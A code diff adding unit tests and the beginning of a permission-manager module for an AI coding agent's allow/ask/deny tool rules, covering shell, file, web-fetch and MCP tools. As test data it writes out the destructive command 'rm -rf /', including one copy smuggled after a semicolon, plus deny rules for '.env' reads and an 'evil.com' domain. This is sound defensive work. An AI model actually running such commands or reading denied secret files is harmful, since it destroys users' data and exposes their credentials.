.env)', () => { + expect(matchesPathPattern('.env', '/project/.env', projectRoot, cwd)).toBe( + true, + ); + expect(matchesPathPattern('*.env', '/project/.env', projectRoot, cwd)).toBe( + true, + ); + }); + + it('** matches recursively across directories', () => { + expect( + matchesPathPattern( + './secrets/**', + '/project/secrets/deep/nested/file.txt', + projectRoot, + cwd, + ), + ).toBe(true); + }); + + it('* matches single directory only', () => { + expect( + matchesPathPattern( + '/src/*.ts', + '/project/src/index.ts', + projectRoot, + cwd, + ), + ).toBe(true); + expect( + matchesPathPattern( + '/src/*.ts', + '/project/src/nested/index.ts', + projectRoot, + cwd, + ), + ).toBe(false); + }); + + it('/docs/** matches under project root docs', () => { + expect( + matchesPathPattern( + '/docs/**', + '/project/docs/readme.md', + projectRoot, + cwd, + ), + ).toBe(true); + expect( + matchesPathPattern( + '/docs/**', + '/project/src/docs/readme.md', + projectRoot, + cwd, + ), + ).toBe(false); + }); + + it('//tmp/scratch.txt matches absolute path', () => { + expect( + matchesPathPattern( + '//tmp/scratch.txt', + '/tmp/scratch.txt', + projectRoot, + cwd, + ), + ).toBe(true); + }); + + it('does not match unrelated paths', () => { + expect( + matchesPathPattern( + './secrets/**', + '/project/public/index.html', + projectRoot, + cwd, + ), + ).toBe(false); + }); +}); + +// ─── matchesDomainPattern ──────────────────────────────────────────────────── + +describe('matchesDomainPattern', () => { + it('matches exact domain', () => { + expect(matchesDomainPattern('domain:example.com', 'example.com')).toBe( + true, + ); + }); + + it('matches subdomain', () => { + expect(matchesDomainPattern('domain:example.com', 'sub.example.com')).toBe( + true, + ); + expect( + matchesDomainPattern('domain:example.com', 'deep.sub.example.com'), + ).toBe(true); + }); + + it('does not match different domain', () => { + expect(matchesDomainPattern('domain:example.com', 'notexample.com')).toBe( + 
false, + ); + }); + + it('is case-insensitive', () => { + expect(matchesDomainPattern('domain:Example.COM', 'example.com')).toBe( + true, + ); + }); + + it('handles missing prefix', () => { + expect(matchesDomainPattern('example.com', 'example.com')).toBe(true); + }); +}); + +// ─── matchesRule (unified) ─────────────────────────────────────────────────── + +describe('matchesRule', () => { + // Basic tool name matching + it('simple tool-name rule matches any invocation', () => { + const rule = parseRule('ShellTool'); + expect(matchesRule(rule, 'run_shell_command')).toBe(true); + expect(matchesRule(rule, 'run_shell_command', 'git status')).toBe(true); + }); + + it('does not match a different tool', () => { + const rule = parseRule('ShellTool'); + expect(matchesRule(rule, 'read_file')).toBe(false); + }); + + // Shell command specifier + it('specifier rule requires a command for shell tools', () => { + const rule = parseRule('Bash(git *)'); + expect(matchesRule(rule, 'run_shell_command')).toBe(false); // no command + expect(matchesRule(rule, 'run_shell_command', 'git status')).toBe(true); + expect(matchesRule(rule, 'run_shell_command', 'echo hello')).toBe(false); + }); + + it('matchesRule checks individual simple commands (compound splitting is at PM level)', () => { + const rule = parseRule('Bash(git *)'); + // matchesRule receives a simple command (already split by PM) + expect(matchesRule(rule, 'run_shell_command', 'git status')).toBe(true); + expect(matchesRule(rule, 'run_shell_command', 'rm -rf /')).toBe(false); + }); + + // Meta-category matching: Read + it('Read rule matches grep_search, glob, list_directory', () => { + const rule = parseRule('Read'); + expect(matchesRule(rule, 'read_file')).toBe(true); + expect(matchesRule(rule, 'grep_search')).toBe(true); + expect(matchesRule(rule, 'glob')).toBe(true); + expect(matchesRule(rule, 'list_directory')).toBe(true); + expect(matchesRule(rule, 'edit')).toBe(false); // not a read tool + }); + + // Meta-category 
matching: Edit + it('Edit rule matches edit and write_file', () => { + const rule = parseRule('Edit'); + expect(matchesRule(rule, 'edit')).toBe(true); + expect(matchesRule(rule, 'write_file')).toBe(true); + expect(matchesRule(rule, 'read_file')).toBe(false); // not an edit tool + }); + + // File path matching + it('Read with path specifier requires filePath', () => { + const rule = parseRule('Read(.env)'); + const pathCtx = { projectRoot: '/project', cwd: '/project' }; + // No filePath → no match + expect(matchesRule(rule, 'read_file')).toBe(false); + // With filePath + expect( + matchesRule( + rule, + 'read_file', + undefined, + '/project/.env', + undefined, + pathCtx, + ), + ).toBe(true); + expect( + matchesRule( + rule, + 'read_file', + undefined, + '/project/other.txt', + undefined, + pathCtx, + ), + ).toBe(false); + }); + + it('Edit path specifier matches write_file too', () => { + const rule = parseRule('Edit(/src/**/*.ts)'); + const pathCtx = { projectRoot: '/project', cwd: '/project' }; + expect( + matchesRule( + rule, + 'write_file', + undefined, + '/project/src/index.ts', + undefined, + pathCtx, + ), + ).toBe(true); + expect( + matchesRule( + rule, + 'write_file', + undefined, + '/project/docs/readme.md', + undefined, + pathCtx, + ), + ).toBe(false); + }); + + // WebFetch domain matching + it('WebFetch domain specifier', () => { + const rule = parseRule('WebFetch(domain:example.com)'); + expect( + matchesRule(rule, 'web_fetch', undefined, undefined, 'example.com'), + ).toBe(true); + expect( + matchesRule(rule, 'web_fetch', undefined, undefined, 'sub.example.com'), + ).toBe(true); + expect( + matchesRule(rule, 'web_fetch', undefined, undefined, 'other.com'), + ).toBe(false); + // No domain → no match + expect(matchesRule(rule, 'web_fetch')).toBe(false); + }); + + // Agent literal matching + it('Agent literal specifier', () => { + const rule = parseRule('Agent(Explore)'); + // Agent is an alias for 'task'; specifier matches via the specifier field + expect( 
+ matchesRule( + rule, + 'task', + undefined, + undefined, + undefined, + undefined, + 'Explore', + ), + ).toBe(true); + expect( + matchesRule( + rule, + 'task', + undefined, + undefined, + undefined, + undefined, + 'Plan', + ), + ).toBe(false); + expect(matchesRule(rule, 'task')).toBe(false); // no specifier + }); + + // MCP tool matching + it('MCP tool exact match', () => { + const rule = parseRule('mcp__puppeteer__puppeteer_navigate'); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_navigate')).toBe(true); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_click')).toBe(false); + }); + + it('MCP server-level match (2-part pattern)', () => { + const rule = parseRule('mcp__puppeteer'); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_navigate')).toBe(true); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_click')).toBe(true); + expect(matchesRule(rule, 'mcp__other__tool')).toBe(false); + }); + + it('MCP wildcard match', () => { + const rule = parseRule('mcp__puppeteer__*'); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_navigate')).toBe(true); + expect(matchesRule(rule, 'mcp__other__tool')).toBe(false); + }); + + it('MCP intra-segment wildcard match (e.g. 
mcp__chrome__use_*)', () => { + const rule = parseRule('mcp__chrome__use_*'); + expect(matchesRule(rule, 'mcp__chrome__use_browser')).toBe(true); + expect(matchesRule(rule, 'mcp__chrome__use_context')).toBe(true); + expect(matchesRule(rule, 'mcp__chrome__navigate')).toBe(false); + expect(matchesRule(rule, 'mcp__other__use_browser')).toBe(false); + }); +}); + +// ─── PermissionManager ────────────────────────────────────────────────────── + +function makeConfig( + opts: Partial<{ + permissionsAllow: string[]; + permissionsAsk: string[]; + permissionsDeny: string[]; + coreTools: string[]; + projectRoot: string; + cwd: string; + }> = {}, +): PermissionManagerConfig { + return { + getPermissionsAllow: () => opts.permissionsAllow, + getPermissionsAsk: () => opts.permissionsAsk, + getPermissionsDeny: () => opts.permissionsDeny, + getCoreTools: () => opts.coreTools, + getProjectRoot: () => opts.projectRoot ?? '/project', + getCwd: () => opts.cwd ?? '/project', + }; +} + +describe('PermissionManager', () => { + let pm: PermissionManager; + + describe('basic rule evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['ReadFileTool', 'Bash(git *)'], + permissionsAsk: ['WriteFileTool'], + permissionsDeny: ['ShellTool'], + }), + ); + pm.initialize(); + }); + + it('returns deny for a denied tool', () => { + expect(pm.evaluate({ toolName: 'run_shell_command' })).toBe('deny'); + }); + + it('returns ask for an ask-rule tool', () => { + expect(pm.evaluate({ toolName: 'write_file' })).toBe('ask'); + }); + + it('returns allow for an allow-rule tool', () => { + expect(pm.evaluate({ toolName: 'read_file' })).toBe('allow'); + }); + + it('returns default for unmatched tool', () => { + // Note: 'glob' is covered by ReadFileTool via Read meta-category, + // so use a tool not in any rule or meta-category + expect(pm.evaluate({ toolName: 'task' })).toBe('default'); + }); + + it('deny takes precedence over ask and allow', () => { + const 
pm2 = new PermissionManager( + makeConfig({ + permissionsAllow: ['run_shell_command'], + permissionsAsk: ['run_shell_command'], + permissionsDeny: ['run_shell_command'], + }), + ); + pm2.initialize(); + expect(pm2.evaluate({ toolName: 'run_shell_command' })).toBe('deny'); + }); + + it('ask takes precedence over allow', () => { + const pm2 = new PermissionManager( + makeConfig({ + permissionsAllow: ['write_file'], + permissionsAsk: ['write_file'], + }), + ); + pm2.initialize(); + expect(pm2.evaluate({ toolName: 'write_file' })).toBe('ask'); + }); + }); + + describe('command-level evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)'], + permissionsDeny: ['Bash(rm *)'], + }), + ); + pm.initialize(); + }); + + it('allows a matching allowed command', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('allow'); + }); + + it('denies a matching denied command', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'rm -rf /' }), + ).toBe('deny'); + }); + + it('returns default for an unmatched command', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'echo hello' }), + ).toBe('default'); + }); + + it('isCommandAllowed delegates to evaluate', () => { + expect(pm.isCommandAllowed('git commit')).toBe('allow'); + expect(pm.isCommandAllowed('rm -rf /')).toBe('deny'); + expect(pm.isCommandAllowed('ls')).toBe('default'); + }); + }); + + describe('compound command evaluation', () => { + it('all sub-commands allowed → allow', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(safe-cmd *)', 'Bash(one-cmd *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'safe-cmd arg1 && one-cmd arg2', + }), + ).toBe('allow'); + }); + + it('one sub-command unmatched → default (most restrictive)', () => { + pm = new PermissionManager( + makeConfig({ + 
permissionsAllow: ['Bash(safe-cmd *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'safe-cmd && two-cmd', + }), + ).toBe('default'); + }); + + it('one sub-command denied → deny', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(safe-cmd *)'], + permissionsDeny: ['Bash(evil-cmd *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'safe-cmd && evil-cmd rm-all', + }), + ).toBe('deny'); + }); + + it('one sub-command ask + one allow → ask', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)'], + permissionsAsk: ['Bash(npm *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git status && npm publish', + }), + ).toBe('ask'); + }); + + it('pipe compound: all matched → allow', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(grep *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git log | grep fix', + }), + ).toBe('allow'); + }); + + it('pipe compound: second unmatched → default', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git log | grep fix', + }), + ).toBe('default'); + }); + + it('semicolon compound: deny in second → deny', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(echo *)'], + permissionsDeny: ['Bash(rm *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'echo hello; rm -rf /', + }), + ).toBe('deny'); + }); + + it('|| compound: all allowed → allow', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + 
pm.evaluate({ + toolName: 'run_shell_command', + command: 'git push || echo failed', + }), + ).toBe('allow'); + }); + + it('operators inside quotes: treated as single command', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: "echo 'a && b'", + }), + ).toBe('allow'); + }); + + it('three-part compound: all must pass', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(npm *)', 'Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git add . && npm test && echo done', + }), + ).toBe('allow'); + }); + + it('three-part compound: one unmatched → default', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git add . 
&& npm test && echo done', + }), + ).toBe('default'); + }); + + it('isCommandAllowed also handles compound commands', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(safe-cmd *)', 'Bash(one-cmd *)'], + permissionsDeny: ['Bash(evil-cmd *)'], + }), + ); + pm.initialize(); + expect(pm.isCommandAllowed('safe-cmd a && one-cmd b')).toBe('allow'); + expect(pm.isCommandAllowed('safe-cmd a && unknown-cmd')).toBe('default'); + expect(pm.isCommandAllowed('safe-cmd a && evil-cmd b')).toBe('deny'); + }); + }); + + describe('file path evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsDeny: ['Read(.env)', 'Edit(/src/generated/**)'], + permissionsAllow: ['Read(/docs/**)'], + projectRoot: '/project', + cwd: '/project', + }), + ); + pm.initialize(); + }); + + it('denies reading a denied file', () => { + expect( + pm.evaluate({ toolName: 'read_file', filePath: '/project/.env' }), + ).toBe('deny'); + }); + + it('denies editing in a denied directory', () => { + expect( + pm.evaluate({ + toolName: 'edit', + filePath: '/project/src/generated/code.ts', + }), + ).toBe('deny'); + }); + + it('allows reading in an allowed directory', () => { + expect( + pm.evaluate({ + toolName: 'read_file', + filePath: '/project/docs/readme.md', + }), + ).toBe('allow'); + }); + + it('Read deny applies to grep_search too (meta-category)', () => { + expect( + pm.evaluate({ toolName: 'grep_search', filePath: '/project/.env' }), + ).toBe('deny'); + }); + + it('returns default for unmatched path', () => { + expect( + pm.evaluate({ + toolName: 'read_file', + filePath: '/project/src/index.ts', + }), + ).toBe('default'); + }); + }); + + describe('WebFetch domain evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['WebFetch(domain:github.com)'], + permissionsDeny: ['WebFetch(domain:evil.com)'], + }), + ); + pm.initialize(); + }); + + it('allows fetch to allowed domain', () => { + 
expect(pm.evaluate({ toolName: 'web_fetch', domain: 'github.com' })).toBe( + 'allow', + ); + }); + + it('allows fetch to subdomain of allowed domain', () => { + expect( + pm.evaluate({ toolName: 'web_fetch', domain: 'api.github.com' }), + ).toBe('allow'); + }); + + it('denies fetch to denied domain', () => { + expect(pm.evaluate({ toolName: 'web_fetch', domain: 'evil.com' })).toBe( + 'deny', + ); + }); + + it('returns default for unmatched domain', () => { + expect( + pm.evaluate({ toolName: 'web_fetch', domain: 'example.com' }), + ).toBe('default'); + }); + }); + + describe('isToolEnabled', () => { + it('returns false for deny-ruled tools', () => { + pm = new PermissionManager( + makeConfig({ permissionsDeny: ['ShellTool'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); + }); + + it('returns true for tools with only specifier deny rules', () => { + pm = new PermissionManager( + makeConfig({ permissionsDeny: ['Bash(rm *)'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); + }); + + it('excludeTools passed via permissionsDeny disables the tool', () => { + pm = new PermissionManager( + makeConfig({ permissionsDeny: ['run_shell_command'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); + }); + + it('coreTools allowlist: listed tool is enabled', () => { + pm = new PermissionManager( + makeConfig({ coreTools: ['read_file', 'Bash'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); // Bash resolves to run_shell_command + }); + + it('coreTools allowlist: unlisted tool is disabled', () => { + pm = new PermissionManager(makeConfig({ coreTools: ['read_file'] })); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); + expect(pm.isToolEnabled('edit')).toBe(false); + }); + + it('coreTools with 
specifier: tool-level check strips specifier', () => { + // "Bash(ls -l)" should register run_shell_command (specifier only affects runtime) + pm = new PermissionManager(makeConfig({ coreTools: ['Bash(ls -l)'] })); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); + expect(pm.isToolEnabled('read_file')).toBe(false); + }); + + it('empty coreTools: all tools enabled (no whitelist restriction)', () => { + pm = new PermissionManager(makeConfig({ coreTools: [] })); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); + }); + + it('coreTools allowlist + deny rule: deny takes precedence for listed tools', () => { + pm = new PermissionManager( + makeConfig({ + coreTools: ['read_file', 'Bash'], + permissionsDeny: ['Bash'], + }), + ); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); // in list but denied + }); + + it('permissionsAllow alone does NOT restrict unlisted tools (not a whitelist)', () => { + // This verifies the previous incorrect behavior is gone: permissionsAllow + // only means "auto-approve", it does NOT block unlisted tools. 
+ pm = new PermissionManager( + makeConfig({ permissionsAllow: ['read_file'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); // not denied, just unreviewed + }); + }); + + describe('session rules', () => { + beforeEach(() => { + pm = new PermissionManager(makeConfig({})); + pm.initialize(); + }); + + it('addSessionAllowRule enables auto-approval for that pattern', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('default'); + pm.addSessionAllowRule('Bash(git *)'); + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('allow'); + }); + + it('session deny rules override allow rules', () => { + pm.addSessionAllowRule('run_shell_command'); + pm.addSessionDenyRule('run_shell_command'); + expect(pm.evaluate({ toolName: 'run_shell_command' })).toBe('deny'); + }); + }); + + describe('allowedTools via permissionsAllow', () => { + it('allow rule auto-approves matching tools/commands', () => { + pm = new PermissionManager( + makeConfig({ permissionsAllow: ['ReadFileTool', 'Bash(git *)'] }), + ); + pm.initialize(); + expect(pm.evaluate({ toolName: 'read_file' })).toBe('allow'); + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('allow'); + }); + }); + + describe('listRules', () => { + it('returns all rules with type and scope', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['ReadFileTool'], + permissionsDeny: ['ShellTool'], + }), + ); + pm.initialize(); + pm.addSessionAllowRule('Bash(git *)'); + + const rules = pm.listRules(); + expect(rules.length).toBe(3); + const sessionAllow = rules.find( + (r) => r.scope === 'session' && r.type === 'allow', + ); + expect(sessionAllow?.rule.toolName).toBe('run_shell_command'); + }); + }); +}); + +// ─── getRuleDisplayName ────────────────────────────────────────────────────── + 
+describe('getRuleDisplayName', () => { + it('maps read tools to "Read" meta-category', () => { + expect(getRuleDisplayName('read_file')).toBe('Read'); + expect(getRuleDisplayName('grep_search')).toBe('Read'); + expect(getRuleDisplayName('glob')).toBe('Read'); + expect(getRuleDisplayName('list_directory')).toBe('Read'); + }); + + it('maps edit tools to "Edit" meta-category', () => { + expect(getRuleDisplayName('edit')).toBe('Edit'); + expect(getRuleDisplayName('write_file')).toBe('Edit'); + }); + + it('maps shell to "Bash"', () => { + expect(getRuleDisplayName('run_shell_command')).toBe('Bash'); + }); + + it('maps web_fetch to "WebFetch"', () => { + expect(getRuleDisplayName('web_fetch')).toBe('WebFetch'); + }); + + it('maps task to "Task" and skill to "Skill"', () => { + expect(getRuleDisplayName('task')).toBe('Task'); + expect(getRuleDisplayName('skill')).toBe('Skill'); + }); + + it('returns the canonical name for unknown tools (e.g. MCP)', () => { + expect(getRuleDisplayName('mcp__server__tool')).toBe('mcp__server__tool'); + }); +}); + +// ─── buildPermissionRules ──────────────────────────────────────────────────── + +describe('buildPermissionRules', () => { + describe('path-based tools (Read/Edit)', () => { + it('generates Read rule scoped to parent directory for read_file', () => { + const rules = buildPermissionRules({ + toolName: 'read_file', + filePath: '/Users/alice/.secrets', + }); + // read_file is file-targeted → dirname gives /Users/alice, plus /** glob + expect(rules).toEqual(['Read(//Users/alice/**)']); + }); + + it('generates Read rule with directory as-is for grep_search', () => { + const rules = buildPermissionRules({ + toolName: 'grep_search', + filePath: '/external/dir', + }); + // grep_search is directory-targeted → path used as-is, plus /** glob + expect(rules).toEqual(['Read(//external/dir/**)']); + }); + + it('generates Read rule with directory as-is for glob', () => { + const rules = buildPermissionRules({ + toolName: 'glob', + filePath: 
'/tmp/data', + }); + expect(rules).toEqual(['Read(//tmp/data/**)']); + }); + + it('generates Read rule with directory as-is for list_directory', () => { + const rules = buildPermissionRules({ + toolName: 'list_directory', + filePath: '/home/user/docs', + }); + expect(rules).toEqual(['Read(//home/user/docs/**)']); + }); + + it('generates Edit rule scoped to parent directory for edit', () => { + const rules = buildPermissionRules({ + toolName: 'edit', + filePath: '/external/file.ts', + }); + // edit is file-targeted → dirname gives /external, plus /** glob + expect(rules).toEqual(['Edit(//external/**)']); + }); + + it('generates Edit rule scoped to parent directory for write_file', () => { + const rules = buildPermissionRules({ + toolName: 'write_file', + filePath: '/tmp/output.txt', + }); + expect(rules).toEqual(['Edit(//tmp/**)']); + }); + + it('falls back to bare display name when no filePath', () => { + const rules = buildPermissionRules({ toolName: 'read_file' }); + expect(rules).toEqual(['Read']); + }); + }); + + describe('generated rules round-trip through parseRule and matchesRule', () => { + it('Read rule for external file covers the containing directory', () => { + const rules = buildPermissionRules({ + toolName: 'read_file', + filePath: '/Users/alice/.secrets', + }); + expect(rules).toHaveLength(1); + expect(rules[0]).toBe('Read(//Users/alice/**)'); + + const parsed = parseRule(rules[0]!); + expect(parsed.toolName).toBe('read_file'); + expect(parsed.specifier).toBe('//Users/alice/**'); + expect(parsed.specifierKind).toBe('path'); + + // Should match the original file (inside the directory) + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/Users/alice/.secrets', + undefined, + { projectRoot: '/some/project', cwd: '/some/project' }, + ), + ).toBe(true); + + // Should also match other files in the same directory + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/Users/alice/.other', + undefined, + { projectRoot: 
'/some/project', cwd: '/some/project' }, + ), + ).toBe(true); + + // Should NOT match files in a different directory + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/Users/bob/.secrets', + undefined, + { projectRoot: '/some/project', cwd: '/some/project' }, + ), + ).toBe(false); + }); + + it('Read rule also matches other read-family tools on the same path', () => { + const rules = buildPermissionRules({ + toolName: 'grep_search', + filePath: '/external/dir', + }); + const parsed = parseRule(rules[0]!); + + // Should match grep_search on a file inside the dir + expect( + matchesRule( + parsed, + 'grep_search', + undefined, + '/external/dir/file.txt', + undefined, + { projectRoot: '/p', cwd: '/p' }, + ), + ).toBe(true); + + // Should also match read_file (Read meta-category) + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/external/dir/other.ts', + undefined, + { projectRoot: '/p', cwd: '/p' }, + ), + ).toBe(true); + }); + }); + + describe('domain-based tools', () => { + it('generates WebFetch rule with domain specifier', () => { + const rules = buildPermissionRules({ + toolName: 'web_fetch', + domain: 'example.com', + }); + expect(rules).toEqual(['WebFetch(example.com)']); + }); + + it('falls back to bare display name when no domain', () => { + const rules = buildPermissionRules({ toolName: 'web_fetch' }); + expect(rules).toEqual(['WebFetch']); + }); + }); + + describe('command-based tools', () => { + it('generates Bash rule with command specifier', () => { + const rules = buildPermissionRules({ + toolName: 'run_shell_command', + command: 'git status', + }); + expect(rules).toEqual(['Bash(git status)']); + }); + + it('falls back to bare display name when no command', () => { + const rules = buildPermissionRules({ toolName: 'run_shell_command' }); + expect(rules).toEqual(['Bash']); + }); + }); + + describe('literal-specifier tools', () => { + it('generates Skill rule with specifier', () => { + const rules = buildPermissionRules({ + 
toolName: 'skill', + specifier: 'Explore', + }); + expect(rules).toEqual(['Skill(Explore)']); + }); + + it('generates Task rule with specifier', () => { + const rules = buildPermissionRules({ + toolName: 'task', + specifier: 'research', + }); + expect(rules).toEqual(['Task(research)']); + }); + + it('falls back to bare display name when no specifier', () => { + const rules = buildPermissionRules({ toolName: 'skill' }); + expect(rules).toEqual(['Skill']); + }); + }); + + describe('unknown / MCP tools', () => { + it('uses the canonical name as display for MCP tools', () => { + const rules = buildPermissionRules({ + toolName: 'mcp__puppeteer__navigate', + }); + expect(rules).toEqual(['mcp__puppeteer__navigate']); + }); + }); +}); diff --git a/packages/core/src/permissions/permission-manager.ts b/packages/core/src/permissions/permission-manager.ts new file mode 100644 index 000000000..06f0548b0 --- /dev/null +++ b/packages/core/src/permissions/permission-manager.ts @@ -0,0 +1,611 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { + parseRules, + parseRule, + matchesRule, + resolveToolName, + splitCompoundCommand, +} from './rule-parser.js'; +import type { PathMatchContext } from './rule-parser.js'; +import { extractShellOperations } from './shell-semantics.js'; +import type { ShellOperation } from './shell-semantics.js'; +import type { + PermissionCheckContext, + PermissionDecision, + PermissionRule, + PermissionRuleSet, + RuleType, + RuleWithSource, + RuleScope, +} from './types.js'; + +/** + * Numeric priority for each PermissionDecision. + * Higher number = more restrictive. Used to combine decisions by taking + * the most restrictive result across base rules + virtual shell operations. + */ +const DECISION_PRIORITY: Readonly> = { + deny: 3, + ask: 2, + default: 1, + allow: 0, +}; + +/** + * Minimal interface for the parts of Config used by PermissionManager. 
+ * Keeps the dependency explicit and avoids a circular import on the + * full Config class. + * + * Each getter already returns a fully-merged list: persistent settings rules + * plus any SDK / CLI params that have been folded in by the Config layer. + * PermissionManager therefore only needs these three getters. + */ +export interface PermissionManagerConfig { + /** Merged allow-rules (settings + coreTools + allowedTools). */ + getPermissionsAllow(): string[] | undefined; + /** Merged ask-rules (settings only). */ + getPermissionsAsk(): string[] | undefined; + /** Merged deny-rules (settings + excludeTools). */ + getPermissionsDeny(): string[] | undefined; + /** Project root directory (for resolving path patterns). */ + getProjectRoot?(): string; + /** Current working directory (for resolving path patterns). */ + getCwd?(): string; + /** + * Returns the current approval mode (plan/default/auto-edit/yolo). + * Used by `getDefaultMode()` to determine the fallback when no rule matches. + */ + getApprovalMode?(): string; + /** + * Returns the legacy coreTools allowlist. + * + * When non-empty, only the tools in this list will be considered enabled at + * the registry level — all other tools will be excluded from registration. + * This preserves the original `tools.core` whitelist semantic inside + * PermissionManager, so `createToolRegistry` can use a single + * `pm.isToolEnabled()` check without any legacy fallback. + * + * @deprecated Configure tool availability via `permissions.deny` rules + * (e.g. `"Bash"` to block all shell commands) instead. + */ + getCoreTools?(): string[] | undefined; +} + +/** + * Manages tool and command permissions by evaluating a set of + * prioritised rules against allow / ask / deny lists. + * + * Rule evaluation order (highest priority first): + * 1. deny rules → PermissionDecision.deny + * 2. ask rules → PermissionDecision.ask + * 3. allow rules → PermissionDecision.allow + * 4. 
(no match) → PermissionDecision.default + * + * Rules can come from two sources, checked in order within each type: + * - Session rules (in-memory only, added during the current session) + * - Persistent rules (from settings files, passed via ConfigParameters) + * + * Legacy params (coreTools / allowedTools / excludeTools) are converted + * to in-memory rules for backward compatibility with the SDK API. + */ +export class PermissionManager { + /** Persistent rules loaded from settings (all scopes merged). */ + private persistentRules: PermissionRuleSet = { + allow: [], + ask: [], + deny: [], + }; + + /** In-memory rules added for the current session only. */ + private sessionRules: PermissionRuleSet = { + allow: [], + ask: [], + deny: [], + }; + + /** + * Canonical tool names from the legacy `coreTools` allowlist. + * When non-null, `isToolEnabled()` rejects any tool not in this set. + * Populated during `initialize()` from `config.getCoreTools()`. + */ + private coreToolsAllowList: Set | null = null; + + constructor(private readonly config: PermissionManagerConfig) {} + + /** + * Initialise from the config's permission parameters. + * Must be called once before any rule lookups. + * + * The config getters already return fully-merged lists (settings + SDK params), + * so we simply parse them into typed rules. + */ + initialize(): void { + this.persistentRules = { + allow: parseRules(this.config.getPermissionsAllow() ?? []), + ask: parseRules(this.config.getPermissionsAsk() ?? []), + deny: parseRules(this.config.getPermissionsDeny() ?? []), + }; + + // Build the coreTools allowlist (legacy whitelist semantic). + // Each entry may be a bare name ("Bash", "read_file") or include a specifier + // ("Bash(ls -l)") – we normalise to canonical tool names and ignore specifiers + // because the registry check is at the tool level, not the invocation level.
+ const rawCoreTools = this.config.getCoreTools?.(); + if (rawCoreTools && rawCoreTools.length > 0) { + this.coreToolsAllowList = new Set( + rawCoreTools.map((t) => parseRule(t).toolName), + ); + } + } + + // --------------------------------------------------------------------------- + // Core evaluation + // --------------------------------------------------------------------------- + + /** + * Evaluate the permission decision for a given tool invocation context. + * + * @param ctx - The context containing the tool name and optional command. + * @returns A PermissionDecision indicating how to handle this tool call. + */ + evaluate(ctx: PermissionCheckContext): PermissionDecision { + const { command } = ctx; + + // For shell commands, split compound commands and evaluate each + // sub-command independently, then return the most restrictive result. + // Priority order (most to least restrictive): deny > ask > default > allow + if (command !== undefined) { + const subCommands = splitCompoundCommand(command); + if (subCommands.length > 1) { + return this.evaluateCompoundCommand(ctx, subCommands); + } + } + + return this.evaluateSingle(ctx); + } + + /** + * Evaluate a single (non-compound) context against all rules. + * + * For shell commands (run_shell_command), the result is the most restrictive + * of: + * 